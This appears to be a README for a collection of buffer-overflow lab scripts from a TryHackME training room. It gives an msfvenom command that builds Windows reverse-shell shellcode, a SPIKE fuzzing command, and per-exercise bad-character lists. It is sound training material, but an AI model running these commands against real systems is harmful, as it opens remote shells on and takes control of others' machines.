Each folder numbered from 1 to x contains the scripts from fuzzing to the stage of creating a final exploit
Buffer overflow Room can be Found at:--> https://tryhackme.com/room/bufferoverflowprep
command used for shellcode generation to Fit with scripts
msfvenom -p windows/shell_reverse_tcp LHOST=<The-Listening-ip> LPORT=<Listening-port> -f py -b "<badChars-specific-to-overflow>" EXITFUNC=thread -v shellcode
command to be used with spike scripts to find payload triggering the crash
generic_send_tcp <target-ip> 1337{this port is specific to the oscp.exe} fuzz.spk 0 0
More on spike:--> https://resources.infosecinstitute.com/topic/intro-to-fuzzing/
The fuzz.py scripts will not Display the output Till you press CTRL + C {yeah I know add a except statement but i find no use in it lol} For this very reason a time dealy of 5 seconds is Added so as soon as you see the application crash in immunity press CTRL + C{in 5 sec delay} to stop the script and this would also give us the bytes at which application crashed
Bad Chars:--> \x00\x07\x2e\xa0
Bad Chars:--> \x00\x23\x3c\x83\xa0\xba
Bad Chars:--> \x00\x11\x40\x5f\xb8\xee\xef
Bad Chars:--> \x00\xa9\xcd\xd4
Bad Chars:--> \x00\x16\x2f\xf4\xfd
Bad Chars:--> \x00\x08\x2c\xad
Bad Chars:--> \x00\x8c\xae\xbe\xfb
# Important Note
→ Our Fuzz script crashed the script at 1300 bytes but we see that the EIP register is still not reached or in other words still not Filled with all A's which it ideally should be so we increase the buffer from 1300 to 1400 and this time it does fill EIP with 41414141 which is when we are good to Go :)
Bad Chars:--> \x00\x1d\x2e\xc7\xee
Bad Chars:--> \x00\x04\x3e\x3f\xe1
Bad Chars:--> \x00\xa0\xad\xbe\xde\xef
The badChars scripts present in each overflow directory contains a badChars variable from which also badchars specific to the overflow have been eliminated
scripts are to be run with python but you may adjust some encoding in place to make them work with python3
Other Overflows will be added as I do them